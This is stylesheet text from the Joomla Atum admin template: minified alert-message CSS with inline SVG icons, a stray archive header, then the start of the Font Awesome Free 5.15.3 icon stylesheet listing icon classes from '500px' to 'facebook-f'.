joomla-alert-fade-out{0%{opacity:1}to{opacity:0}}@media (prefers-reduced-motion:reduce){joomla-alert{-webkit-animation-duration:1ms!important;animation-duration:1ms!important}}#system-message-container joomla-alert{position:relative;display:flex;width:100%;min-width:16rem;padding:0;margin-bottom:1rem;color:var(--alert-accent-color,var(--template-bg-dark));background-color:var(--alert-bg-color,var(--white));border:1px solid var(--alert-accent-color,var(--template-bg-dark));border-radius:.25rem;transition:opacity .15s linear}#system-message-container joomla-alert .alert-heading{display:flex;flex-direction:column;justify-content:center;padding:.8rem;color:var(--white);background:var(--alert-accent-color,var(--template-bg-dark));align-content:center}#system-message-container joomla-alert .alert-heading .message:before,#system-message-container joomla-alert .alert-heading .success:before{display:inline-block;width:1em;height:1em;content:"";background-image:url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1299 813l-422 422q-19 19-45 19t-45-19l-294-294q-19-19-19-45t19-45l102-102q19-19 45-19t45 19l147 147 275-275q19-19 45-19t45 19l102 102q19 19 19 45t-19 45zm141 83q0-148-73-273t-198-198-273-73-273 73-198 198-73 273 73 273 198 198 273 73 273-73 198-198 73-273zm224 0q0 209-103 385.5t-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103 385.5 103 279.5 279.5 103 385.5z"/></svg>');background-size:100%}#system-message-container joomla-alert .alert-heading .info:before,#system-message-container joomla-alert .alert-heading .notice:before{display:inline-block;width:1em;height:1em;content:"";background-image:url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 110c23.196 0 42 18.804 42 42s-18.804 42-42 42-42-18.804-42-42 18.804-42 42-42zm56 254c0 6.627-5.373 12-12 12h-88c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h12v-64h-12c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h64c6.627 0 12 5.373 12 12v100h12c6.627 0 12 5.373 12 12v24z"/></svg>');background-size:100%}#system-message-container joomla-alert .alert-heading .warning:before{display:inline-block;width:1em;height:1em;content:"";background-image:url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1024 1375v-190q0-14-9.5-23.5t-22.5-9.5h-192q-13 0-22.5 9.5t-9.5 23.5v190q0 14 9.5 23.5t22.5 9.5h192q13 0 22.5-9.5t9.5-23.5zm-2-374l18-459q0-12-10-19-13-11-24-11h-220q-11 0-24 11-10 7-10 21l17 457q0 10 10 16.5t24 6.5h185q14 0 23.5-6.5t10.5-16.5zm-14-934l768 1408q35 63-2 126-17 29-46.5 46t-63.5 17h-1536q-34 0-63.5-17t-46.5-46q-37-63-2-126l768-1408q17-31 47-49t65-18 65 18 47 49z"/></svg>');background-size:100%}#system-message-container joomla-alert .alert-heading .danger:before,#system-message-container joomla-alert .alert-heading .error:before{display:inline-block;width:1em;height:1em;content:"";background-image:url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm101.8-262.2L295.6 256l62.2 62.2c4.7 4.7 4.7 12.3 0 17l-22.6 22.6c-4.7 4.7-12.3 4.7-17 0L256 295.6l-62.2 62.2c-4.7 4.7-12.3 4.7-17 0l-22.6-22.6c-4.7-4.7-4.7-12.3 0-17l62.2-62.2-62.2-62.2c-4.7-4.7-4.7-12.3 0-17l22.6-22.6c4.7-4.7 12.3-4.7 17 0l62.2 62.2 62.2-62.2c4.7-4.7 12.3-4.7 17 0l22.6 22.6c4.7 4.7 4.7 12.3 0 17z"/></svg>');background-size:100%}#system-message-container joomla-alert .alert-wrapper{width:100%}#system-message-container joomla-alert .alert-link{color:var(--template-link-color);text-decoration:underline}#system-message-container joomla-alert[type=message],#system-message-container joomla-alert[type=success]{--alert-accent-color:#457d54;--alert-bg-color:#f2f8f4}#system-message-container joomla-alert[type=info],#system-message-container joomla-alert[type=notice]{--alert-accent-color:var(--template-bg-dark-70);--alert-bg-color:var(--white)}#system-message-container joomla-alert[type=warning]{color:#996900;--alert-accent-color:#ffb514;--alert-bg-color:#fffcf4}#system-message-container joomla-alert[type=warning] .joomla-alert--close{color:#996900}#system-message-container joomla-alert[type=danger],#system-message-container joomla-alert[type=error]{--alert-accent-color:#c52827;--alert-bg-color:#fef8f8}#system-message-container joomla-alert .joomla-alert--close,#system-message-container joomla-alert .joomla-alert-button--close{position:absolute;top:0;right:0;padding:.75rem .8rem;font-size:2rem;line-height:1rem;color:var(--alert-accent-color);background:none;border:0;opacity:1}#system-message-container joomla-alert .joomla-alert--close:focus,#system-message-container joomla-alert .joomla-alert--close:hover,#system-message-container joomla-alert .joomla-alert-button--close:focus,#system-message-container joomla-alert .joomla-alert-button--close:hover{text-decoration:none;cursor:pointer;opacity:.75}[dir=rtl] #system-message-container joomla-alert .joomla-alert--close,[dir=rtl] #system-message-container joomla-alert .joomla-alert-button--close{right:auto;left:0}#system-message-container joomla-alert div{font-size:1rem}#system-message-container joomla-alert div .alert-message{padding:.15rem .3rem;-webkit-padding-end:2rem;padding-inline-end:2rem;margin:.5rem}#system-message-container joomla-alert div .alert-message:not(:first-of-type){border-top:1px solid var(--alert-accent-color)}PK!H���c�c0atum/css/vendor/fontawesome-free/fontawesome.cssnu&1i�@charset "UTF-8";
/*!
 * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */
.fa,
.fas,
[class^=icon-],
[class*=" icon-"],
.far,
.fal,
.fad,
.fab,
.icon-joomla {
  -moz-osx-font-smoothing: grayscale;
  -webkit-font-smoothing: antialiased;
  display: inline-block;
  font-style: normal;
  font-variant: normal;
  text-rendering: auto;
  line-height: 1;
}

.icon-joomla, [class^=icon-],
[class*=" icon-"] {
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  display: inline-block;
  font-style: normal;
  font-variant: normal;
  font-weight: normal;
  line-height: 1;
}

.fa-lg, .icon-lg {
  font-size: 1.3333333333em;
  line-height: 0.75em;
  vertical-align: -0.0667em;
}

.fa-xs, .icon-xs {
  font-size: 0.75em;
}

.fa-sm, .icon-sm {
  font-size: 0.875em;
}

.fa-1x {
  font-size: 1em;
}

.fa-2x {
  font-size: 2em;
}

.fa-3x {
  font-size: 3em;
}

.fa-4x {
  font-size: 4em;
}

.fa-5x {
  font-size: 5em;
}

.fa-6x {
  font-size: 6em;
}

.fa-7x {
  font-size: 7em;
}

.fa-8x {
  font-size: 8em;
}

.fa-9x {
  font-size: 9em;
}

.fa-10x {
  font-size: 10em;
}

.fa-fw, .icon-fw {
  text-align: center;
  width: 1.25em;
}

.fa-ul, .icon-ul {
  list-style-type: none;
  margin-left: 2.5em;
  padding-left: 0;
}
.fa-ul > li, .icon-ul > li {
  position: relative;
}

.fa-li, .icon-li {
  left: -2em;
  position: absolute;
  text-align: center;
  width: 2em;
  line-height: inherit;
}

.fa-border, .icon-border {
  border: solid 0.08em #eee;
  border-radius: 0.1em;
  padding: 0.2em 0.25em 0.15em;
}

.fa-pull-left, .icon-pull-left {
  float: left;
}

.fa-pull-right, .icon-pull-right {
  float: right;
}

.fa.fa-pull-left, .fa.icon-pull-left,
.fas.fa-pull-left,
.fas.icon-pull-left,
.fa-pull-left[class^=icon-],
[class^=icon-].icon-pull-left,
.fa-pull-left[class*=" icon-"],
[class*=" icon-"].icon-pull-left,
.far.fa-pull-left,
.far.icon-pull-left,
.fal.fa-pull-left,
.fal.icon-pull-left,
.fab.fa-pull-left,
.fab.icon-pull-left,
.fa-pull-left.icon-joomla,
.icon-joomla.icon-pull-left {
  margin-right: 0.3em;
}
.fa.fa-pull-right, .fa.icon-pull-right,
.fas.fa-pull-right,
.fas.icon-pull-right,
.fa-pull-right[class^=icon-],
[class^=icon-].icon-pull-right,
.fa-pull-right[class*=" icon-"],
[class*=" icon-"].icon-pull-right,
.far.fa-pull-right,
.far.icon-pull-right,
.fal.fa-pull-right,
.fal.icon-pull-right,
.fab.fa-pull-right,
.fab.icon-pull-right,
.fa-pull-right.icon-joomla,
.icon-joomla.icon-pull-right {
  margin-left: 0.3em;
}

.fa-spin, .icon-spin {
  -webkit-animation: fa-spin 2s infinite linear;
          animation: fa-spin 2s infinite linear;
}

.fa-pulse, .icon-pulse {
  -webkit-animation: fa-spin 1s infinite steps(8);
          animation: fa-spin 1s infinite steps(8);
}

@-webkit-keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}

@keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}
.fa-rotate-90, .icon-rotate-90 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";
  -webkit-transform: rotate(90deg);
          transform: rotate(90deg);
}

.fa-rotate-180, .icon-rotate-180 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";
  -webkit-transform: rotate(180deg);
          transform: rotate(180deg);
}

.fa-rotate-270, .icon-rotate-270 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";
  -webkit-transform: rotate(270deg);
          transform: rotate(270deg);
}

.fa-flip-horizontal, .icon-flip-horizontal {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";
  -webkit-transform: scale(-1, 1);
          transform: scale(-1, 1);
}

.fa-flip-vertical, .icon-flip-vertical {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(1, -1);
          transform: scale(1, -1);
}

.fa-flip-both, .icon-flip-both, .fa-flip-horizontal.fa-flip-vertical, .fa-flip-horizontal.icon-flip-vertical, .fa-flip-vertical.icon-flip-horizontal, .icon-flip-horizontal.icon-flip-vertical {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(-1, -1);
          transform: scale(-1, -1);
}

:root .fa-rotate-90, :root .icon-rotate-90,
:root .fa-rotate-180,
:root .icon-rotate-180,
:root .fa-rotate-270,
:root .icon-rotate-270,
:root .fa-flip-horizontal,
:root .icon-flip-horizontal,
:root .fa-flip-vertical,
:root .icon-flip-vertical,
:root .fa-flip-both,
:root .icon-flip-both {
  -webkit-filter: none;
          filter: none;
}

.fa-stack, .icon-stack {
  display: inline-block;
  height: 2em;
  line-height: 2em;
  position: relative;
  vertical-align: middle;
  width: 2.5em;
}

.fa-stack-1x, .icon-stack-1x,
.fa-stack-2x,
.icon-stack-2x {
  left: 0;
  position: absolute;
  text-align: center;
  width: 100%;
}

.fa-stack-1x, .icon-stack-1x {
  line-height: inherit;
}

.fa-stack-2x, .icon-stack-2x {
  font-size: 2em;
}

.fa-inverse, .icon-inverse {
  color: #fff;
}

/* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen
readers do not read off random characters that represent icons */
.fa-500px:before {
  content: "";
}

.fa-accessible-icon:before {
  content: "";
}

.fa-accusoft:before {
  content: "";
}

.fa-acquisitions-incorporated:before {
  content: "";
}

.fa-ad:before {
  content: "";
}

.fa-address-book:before {
  content: "";
}

.fa-address-card:before {
  content: "";
}

.fa-adjust:before {
  content: "";
}

.fa-adn:before {
  content: "";
}

.fa-adversal:before {
  content: "";
}

.fa-affiliatetheme:before {
  content: "";
}

.fa-air-freshener:before {
  content: "";
}

.fa-airbnb:before {
  content: "";
}

.fa-algolia:before {
  content: "";
}

.fa-align-center:before {
  content: "";
}

.fa-align-justify:before {
  content: "";
}

.fa-align-left:before {
  content: "";
}

.fa-align-right:before {
  content: "";
}

.fa-alipay:before {
  content: "";
}

.fa-allergies:before {
  content: "";
}

.fa-amazon:before {
  content: "";
}

.fa-amazon-pay:before {
  content: "";
}

.fa-ambulance:before {
  content: "";
}

.fa-american-sign-language-interpreting:before {
  content: "";
}

.fa-amilia:before {
  content: "";
}

.fa-anchor:before {
  content: "";
}

.fa-android:before {
  content: "";
}

.fa-angellist:before {
  content: "";
}

.fa-angle-double-down:before {
  content: "";
}

.fa-angle-double-left:before {
  content: "";
}

.fa-angle-double-right:before {
  content: "";
}

.fa-angle-double-up:before {
  content: "";
}

.fa-angle-down:before {
  content: "";
}

.fa-angle-left:before {
  content: "";
}

.fa-angle-right:before {
  content: "";
}

.fa-angle-up:before {
  content: "";
}

.fa-angry:before {
  content: "";
}

.fa-angrycreative:before {
  content: "";
}

.fa-angular:before {
  content: "";
}

.fa-ankh:before {
  content: "";
}

.fa-app-store:before {
  content: "";
}

.fa-app-store-ios:before {
  content: "";
}

.fa-apper:before {
  content: "";
}

.fa-apple:before {
  content: "";
}

.fa-apple-alt:before {
  content: "";
}

.fa-apple-pay:before {
  content: "";
}

.fa-archive:before {
  content: "";
}

.fa-archway:before {
  content: "";
}

.fa-arrow-alt-circle-down:before {
  content: "";
}

.fa-arrow-alt-circle-left:before {
  content: "";
}

.fa-arrow-alt-circle-right:before {
  content: "";
}

.fa-arrow-alt-circle-up:before {
  content: "";
}

.fa-arrow-circle-down:before {
  content: "";
}

.fa-arrow-circle-left:before {
  content: "";
}

.fa-arrow-circle-right:before {
  content: "";
}

.fa-arrow-circle-up:before {
  content: "";
}

.fa-arrow-down:before {
  content: "";
}

.fa-arrow-left:before {
  content: "";
}

.fa-arrow-right:before {
  content: "";
}

.fa-arrow-up:before {
  content: "";
}

.fa-arrows-alt:before {
  content: "";
}

.fa-arrows-alt-h:before {
  content: "";
}

.fa-arrows-alt-v:before {
  content: "";
}

.fa-artstation:before {
  content: "";
}

.fa-assistive-listening-systems:before {
  content: "";
}

.fa-asterisk:before {
  content: "";
}

.fa-asymmetrik:before {
  content: "";
}

.fa-at:before {
  content: "";
}

.fa-atlas:before {
  content: "";
}

.fa-atlassian:before {
  content: "";
}

.fa-atom:before {
  content: "";
}

.fa-audible:before {
  content: "";
}

.fa-audio-description:before {
  content: "";
}

.fa-autoprefixer:before {
  content: "";
}

.fa-avianex:before {
  content: "";
}

.fa-aviato:before {
  content: "";
}

.fa-award:before {
  content: "";
}

.fa-aws:before {
  content: "";
}

.fa-baby:before {
  content: "";
}

.fa-baby-carriage:before {
  content: "";
}

.fa-backspace:before {
  content: "";
}

.fa-backward:before {
  content: "";
}

.fa-bacon:before {
  content: "";
}

.fa-bacteria:before {
  content: "";
}

.fa-bacterium:before {
  content: "";
}

.fa-bahai:before {
  content: "";
}

.fa-balance-scale:before {
  content: "";
}

.fa-balance-scale-left:before {
  content: "";
}

.fa-balance-scale-right:before {
  content: "";
}

.fa-ban:before {
  content: "";
}

.fa-band-aid:before {
  content: "";
}

.fa-bandcamp:before {
  content: "";
}

.fa-barcode:before {
  content: "";
}

.fa-bars:before {
  content: "";
}

.fa-baseball-ball:before {
  content: "";
}

.fa-basketball-ball:before {
  content: "";
}

.fa-bath:before {
  content: "";
}

.fa-battery-empty:before {
  content: "";
}

.fa-battery-full:before {
  content: "";
}

.fa-battery-half:before {
  content: "";
}

.fa-battery-quarter:before {
  content: "";
}

.fa-battery-three-quarters:before {
  content: "";
}

.fa-battle-net:before {
  content: "";
}

.fa-bed:before {
  content: "";
}

.fa-beer:before {
  content: "";
}

.fa-behance:before {
  content: "";
}

.fa-behance-square:before {
  content: "";
}

.fa-bell:before {
  content: "";
}

.fa-bell-slash:before {
  content: "";
}

.fa-bezier-curve:before {
  content: "";
}

.fa-bible:before {
  content: "";
}

.fa-bicycle:before {
  content: "";
}

.fa-biking:before {
  content: "";
}

.fa-bimobject:before {
  content: "";
}

.fa-binoculars:before {
  content: "";
}

.fa-biohazard:before {
  content: "";
}

.fa-birthday-cake:before {
  content: "";
}

.fa-bitbucket:before {
  content: "";
}

.fa-bitcoin:before {
  content: "";
}

.fa-bity:before {
  content: "";
}

.fa-black-tie:before {
  content: "";
}

.fa-blackberry:before {
  content: "";
}

.fa-blender:before {
  content: "";
}

.fa-blender-phone:before {
  content: "";
}

.fa-blind:before {
  content: "";
}

.fa-blog:before {
  content: "";
}

.fa-blogger:before {
  content: "";
}

.fa-blogger-b:before {
  content: "";
}

.fa-bluetooth:before {
  content: "";
}

.fa-bluetooth-b:before {
  content: "";
}

.fa-bold:before {
  content: "";
}

.fa-bolt:before {
  content: "";
}

.fa-bomb:before {
  content: "";
}

.fa-bone:before {
  content: "";
}

.fa-bong:before {
  content: "";
}

.fa-book:before {
  content: "";
}

.fa-book-dead:before {
  content: "";
}

.fa-book-medical:before {
  content: "";
}

.fa-book-open:before {
  content: "";
}

.fa-book-reader:before {
  content: "";
}

.fa-bookmark:before {
  content: "";
}

.fa-bootstrap:before {
  content: "";
}

.fa-border-all:before {
  content: "";
}

.fa-border-none:before {
  content: "";
}

.fa-border-style:before {
  content: "";
}

.fa-bowling-ball:before {
  content: "";
}

.fa-box:before {
  content: "";
}

.fa-box-open:before {
  content: "";
}

.fa-box-tissue:before {
  content: "";
}

.fa-boxes:before {
  content: "";
}

.fa-braille:before {
  content: "";
}

.fa-brain:before {
  content: "";
}

.fa-bread-slice:before {
  content: "";
}

.fa-briefcase:before {
  content: "";
}

.fa-briefcase-medical:before {
  content: "";
}

.fa-broadcast-tower:before {
  content: "";
}

.fa-broom:before {
  content: "";
}

.fa-brush:before {
  content: "";
}

.fa-btc:before {
  content: "";
}

.fa-buffer:before {
  content: "";
}

.fa-bug:before {
  content: "";
}

.fa-building:before {
  content: "";
}

.fa-bullhorn:before {
  content: "";
}

.fa-bullseye:before {
  content: "";
}

.fa-burn:before {
  content: "";
}

.fa-buromobelexperte:before {
  content: "";
}

.fa-bus:before {
  content: "";
}

.fa-bus-alt:before {
  content: "";
}

.fa-business-time:before {
  content: "";
}

.fa-buy-n-large:before {
  content: "";
}

.fa-buysellads:before {
  content: "";
}

.fa-calculator:before {
  content: "";
}

.fa-calendar:before {
  content: "";
}

.fa-calendar-alt:before {
  content: "";
}

.fa-calendar-check:before {
  content: "";
}

.fa-calendar-day:before {
  content: "";
}

.fa-calendar-minus:before {
  content: "";
}

.fa-calendar-plus:before {
  content: "";
}

.fa-calendar-times:before {
  content: "";
}

.fa-calendar-week:before {
  content: "";
}

.fa-camera:before {
  content: "";
}

.fa-camera-retro:before {
  content: "";
}

.fa-campground:before {
  content: "";
}

.fa-canadian-maple-leaf:before {
  content: "";
}

.fa-candy-cane:before {
  content: "";
}

.fa-cannabis:before {
  content: "";
}

.fa-capsules:before {
  content: "";
}

.fa-car:before {
  content: "";
}

.fa-car-alt:before {
  content: "";
}

.fa-car-battery:before {
  content: "";
}

.fa-car-crash:before {
  content: "";
}

.fa-car-side:before {
  content: "";
}

.fa-caravan:before {
  content: "";
}

.fa-caret-down:before {
  content: "";
}

.fa-caret-left:before {
  content: "";
}

.fa-caret-right:before {
  content: "";
}

.fa-caret-square-down:before {
  content: "";
}

.fa-caret-square-left:before {
  content: "";
}

.fa-caret-square-right:before {
  content: "";
}

.fa-caret-square-up:before {
  content: "";
}

.fa-caret-up:before {
  content: "";
}

.fa-carrot:before {
  content: "";
}

.fa-cart-arrow-down:before {
  content: "";
}

.fa-cart-plus:before {
  content: "";
}

.fa-cash-register:before {
  content: "";
}

.fa-cat:before {
  content: "";
}

.fa-cc-amazon-pay:before {
  content: "";
}

.fa-cc-amex:before {
  content: "";
}

.fa-cc-apple-pay:before {
  content: "";
}

.fa-cc-diners-club:before {
  content: "";
}

.fa-cc-discover:before {
  content: "";
}

.fa-cc-jcb:before {
  content: "";
}

.fa-cc-mastercard:before {
  content: "";
}

.fa-cc-paypal:before {
  content: "";
}

.fa-cc-stripe:before {
  content: "";
}

.fa-cc-visa:before {
  content: "";
}

.fa-centercode:before {
  content: "";
}

.fa-centos:before {
  content: "";
}

.fa-certificate:before {
  content: "";
}

.fa-chair:before {
  content: "";
}

.fa-chalkboard:before {
  content: "";
}

.fa-chalkboard-teacher:before {
  content: "";
}

.fa-charging-station:before {
  content: "";
}

.fa-chart-area:before {
  content: "";
}

.fa-chart-bar:before {
  content: "";
}

.fa-chart-line:before {
  content: "";
}

.fa-chart-pie:before {
  content: "";
}

.fa-check:before {
  content: "";
}

.fa-check-circle:before {
  content: "";
}

.fa-check-double:before {
  content: "";
}

.fa-check-square:before {
  content: "";
}

.fa-cheese:before {
  content: "";
}

.fa-chess:before {
  content: "";
}

.fa-chess-bishop:before {
  content: "";
}

.fa-chess-board:before {
  content: "";
}

.fa-chess-king:before {
  content: "";
}

.fa-chess-knight:before {
  content: "";
}

.fa-chess-pawn:before {
  content: "";
}

.fa-chess-queen:before {
  content: "";
}

.fa-chess-rook:before {
  content: "";
}

.fa-chevron-circle-down:before {
  content: "";
}

.fa-chevron-circle-left:before {
  content: "";
}

.fa-chevron-circle-right:before {
  content: "";
}

.fa-chevron-circle-up:before {
  content: "";
}

.fa-chevron-down:before {
  content: "";
}

.fa-chevron-left:before {
  content: "";
}

.fa-chevron-right:before {
  content: "";
}

.fa-chevron-up:before {
  content: "";
}

.fa-child:before {
  content: "";
}

.fa-chrome:before {
  content: "";
}

.fa-chromecast:before {
  content: "";
}

.fa-church:before {
  content: "";
}

.fa-circle:before {
  content: "";
}

.fa-circle-notch:before {
  content: "";
}

.fa-city:before {
  content: "";
}

.fa-clinic-medical:before {
  content: "";
}

.fa-clipboard:before {
  content: "";
}

.fa-clipboard-check:before {
  content: "";
}

.fa-clipboard-list:before {
  content: "";
}

.fa-clock:before {
  content: "";
}

.fa-clone:before {
  content: "";
}

.fa-closed-captioning:before {
  content: "";
}

.fa-cloud:before {
  content: "";
}

.fa-cloud-download-alt:before {
  content: "";
}

.fa-cloud-meatball:before {
  content: "";
}

.fa-cloud-moon:before {
  content: "";
}

.fa-cloud-moon-rain:before {
  content: "";
}

.fa-cloud-rain:before {
  content: "";
}

.fa-cloud-showers-heavy:before {
  content: "";
}

.fa-cloud-sun:before {
  content: "";
}

.fa-cloud-sun-rain:before {
  content: "";
}

.fa-cloud-upload-alt:before {
  content: "";
}

.fa-cloudflare:before {
  content: "";
}

.fa-cloudscale:before {
  content: "";
}

.fa-cloudsmith:before {
  content: "";
}

.fa-cloudversify:before {
  content: "";
}

.fa-cocktail:before {
  content: "";
}

.fa-code:before {
  content: "";
}

.fa-code-branch:before {
  content: "";
}

.fa-codepen:before {
  content: "";
}

.fa-codiepie:before {
  content: "";
}

.fa-coffee:before {
  content: "";
}

.fa-cog:before {
  content: "";
}

.fa-cogs:before {
  content: "";
}

.fa-coins:before {
  content: "";
}

.fa-columns:before {
  content: "";
}

.fa-comment:before {
  content: "";
}

.fa-comment-alt:before {
  content: "";
}

.fa-comment-dollar:before {
  content: "";
}

.fa-comment-dots:before {
  content: "";
}

.fa-comment-medical:before {
  content: "";
}

.fa-comment-slash:before {
  content: "";
}

.fa-comments:before {
  content: "";
}

.fa-comments-dollar:before {
  content: "";
}

.fa-compact-disc:before {
  content: "";
}

.fa-compass:before {
  content: "";
}

.fa-compress:before {
  content: "";
}

.fa-compress-alt:before {
  content: "";
}

.fa-compress-arrows-alt:before {
  content: "";
}

.fa-concierge-bell:before {
  content: "";
}

.fa-confluence:before {
  content: "";
}

.fa-connectdevelop:before {
  content: "";
}

.fa-contao:before {
  content: "";
}

.fa-cookie:before {
  content: "";
}

.fa-cookie-bite:before {
  content: "";
}

.fa-copy:before {
  content: "";
}

.fa-copyright:before {
  content: "";
}

.fa-cotton-bureau:before {
  content: "";
}

.fa-couch:before {
  content: "";
}

.fa-cpanel:before {
  content: "";
}

.fa-creative-commons:before {
  content: "";
}

.fa-creative-commons-by:before {
  content: "";
}

.fa-creative-commons-nc:before {
  content: "";
}

.fa-creative-commons-nc-eu:before {
  content: "";
}

.fa-creative-commons-nc-jp:before {
  content: "";
}

.fa-creative-commons-nd:before {
  content: "";
}

.fa-creative-commons-pd:before {
  content: "";
}

.fa-creative-commons-pd-alt:before {
  content: "";
}

.fa-creative-commons-remix:before {
  content: "";
}

.fa-creative-commons-sa:before {
  content: "";
}

.fa-creative-commons-sampling:before {
  content: "";
}

.fa-creative-commons-sampling-plus:before {
  content: "";
}

.fa-creative-commons-share:before {
  content: "";
}

.fa-creative-commons-zero:before {
  content: "";
}

.fa-credit-card:before {
  content: "";
}

.fa-critical-role:before {
  content: "";
}

.fa-crop:before {
  content: "";
}

.fa-crop-alt:before {
  content: "";
}

.fa-cross:before {
  content: "";
}

.fa-crosshairs:before {
  content: "";
}

.fa-crow:before {
  content: "";
}

.fa-crown:before {
  content: "";
}

.fa-crutch:before {
  content: "";
}

.fa-css3:before {
  content: "";
}

.fa-css3-alt:before {
  content: "";
}

.fa-cube:before {
  content: "";
}

.fa-cubes:before {
  content: "";
}

.fa-cut:before {
  content: "";
}

.fa-cuttlefish:before {
  content: "";
}

.fa-d-and-d:before {
  content: "";
}

.fa-d-and-d-beyond:before {
  content: "";
}

.fa-dailymotion:before {
  content: "";
}

.fa-dashcube:before {
  content: "";
}

.fa-database:before {
  content: "";
}

.fa-deaf:before {
  content: "";
}

.fa-deezer:before {
  content: "";
}

.fa-delicious:before {
  content: "";
}

.fa-democrat:before {
  content: "";
}

.fa-deploydog:before {
  content: "";
}

.fa-deskpro:before {
  content: "";
}

.fa-desktop:before {
  content: "";
}

.fa-dev:before {
  content: "";
}

.fa-deviantart:before {
  content: "";
}

.fa-dharmachakra:before {
  content: "";
}

.fa-dhl:before {
  content: "";
}

.fa-diagnoses:before {
  content: "";
}

.fa-diaspora:before {
  content: "";
}

.fa-dice:before {
  content: "";
}

.fa-dice-d20:before {
  content: "";
}

.fa-dice-d6:before {
  content: "";
}

.fa-dice-five:before {
  content: "";
}

.fa-dice-four:before {
  content: "";
}

.fa-dice-one:before {
  content: "";
}

.fa-dice-six:before {
  content: "";
}

.fa-dice-three:before {
  content: "";
}

.fa-dice-two:before {
  content: "";
}

.fa-digg:before {
  content: "";
}

.fa-digital-ocean:before {
  content: "";
}

.fa-digital-tachograph:before {
  content: "";
}

.fa-directions:before {
  content: "";
}

.fa-discord:before {
  content: "";
}

.fa-discourse:before {
  content: "";
}

.fa-disease:before {
  content: "";
}

.fa-divide:before {
  content: "";
}

.fa-dizzy:before {
  content: "";
}

.fa-dna:before {
  content: "";
}

.fa-dochub:before {
  content: "";
}

.fa-docker:before {
  content: "";
}

.fa-dog:before {
  content: "";
}

.fa-dollar-sign:before {
  content: "";
}

.fa-dolly:before {
  content: "";
}

.fa-dolly-flatbed:before {
  content: "";
}

.fa-donate:before {
  content: "";
}

.fa-door-closed:before {
  content: "";
}

.fa-door-open:before {
  content: "";
}

.fa-dot-circle:before {
  content: "";
}

.fa-dove:before {
  content: "";
}

.fa-download:before {
  content: "";
}

.fa-draft2digital:before {
  content: "";
}

.fa-drafting-compass:before {
  content: "";
}

.fa-dragon:before {
  content: "";
}

.fa-draw-polygon:before {
  content: "";
}

.fa-dribbble:before {
  content: "";
}

.fa-dribbble-square:before {
  content: "";
}

.fa-dropbox:before {
  content: "";
}

.fa-drum:before {
  content: "";
}

.fa-drum-steelpan:before {
  content: "";
}

.fa-drumstick-bite:before {
  content: "";
}

.fa-drupal:before {
  content: "";
}

.fa-dumbbell:before {
  content: "";
}

.fa-dumpster:before {
  content: "";
}

.fa-dumpster-fire:before {
  content: "";
}

.fa-dungeon:before {
  content: "";
}

.fa-dyalog:before {
  content: "";
}

.fa-earlybirds:before {
  content: "";
}

.fa-ebay:before {
  content: "";
}

.fa-edge:before {
  content: "";
}

.fa-edge-legacy:before {
  content: "";
}

.fa-edit:before {
  content: "";
}

.fa-egg:before {
  content: "";
}

.fa-eject:before {
  content: "";
}

.fa-elementor:before {
  content: "";
}

.fa-ellipsis-h:before {
  content: "";
}

.fa-ellipsis-v:before {
  content: "";
}

.fa-ello:before {
  content: "";
}

.fa-ember:before {
  content: "";
}

.fa-empire:before {
  content: "";
}

.fa-envelope:before {
  content: "";
}

.fa-envelope-open:before {
  content: "";
}

.fa-envelope-open-text:before {
  content: "";
}

.fa-envelope-square:before {
  content: "";
}

.fa-envira:before {
  content: "";
}

.fa-equals:before {
  content: "";
}

.fa-eraser:before {
  content: "";
}

.fa-erlang:before {
  content: "";
}

.fa-ethereum:before {
  content: "";
}

.fa-ethernet:before {
  content: "";
}

.fa-etsy:before {
  content: "";
}

.fa-euro-sign:before {
  content: "";
}

.fa-evernote:before {
  content: "";
}

.fa-exchange-alt:before {
  content: "";
}

.fa-exclamation:before {
  content: "";
}

.fa-exclamation-circle:before {
  content: "";
}

.fa-exclamation-triangle:before {
  content: "";
}

.fa-expand:before {
  content: "";
}

.fa-expand-alt:before {
  content: "";
}

.fa-expand-arrows-alt:before {
  content: "";
}

.fa-expeditedssl:before {
  content: "";
}

.fa-external-link-alt:before {
  content: "";
}

.fa-external-link-square-alt:before {
  content: "";
}

.fa-eye:before {
  content: "";
}

.fa-eye-dropper:before {
  content: "";
}

.fa-eye-slash:before {
  content: "";
}

.fa-facebook:before {
  content: "";
}

.fa-facebook-f:before {
  content: "";
}

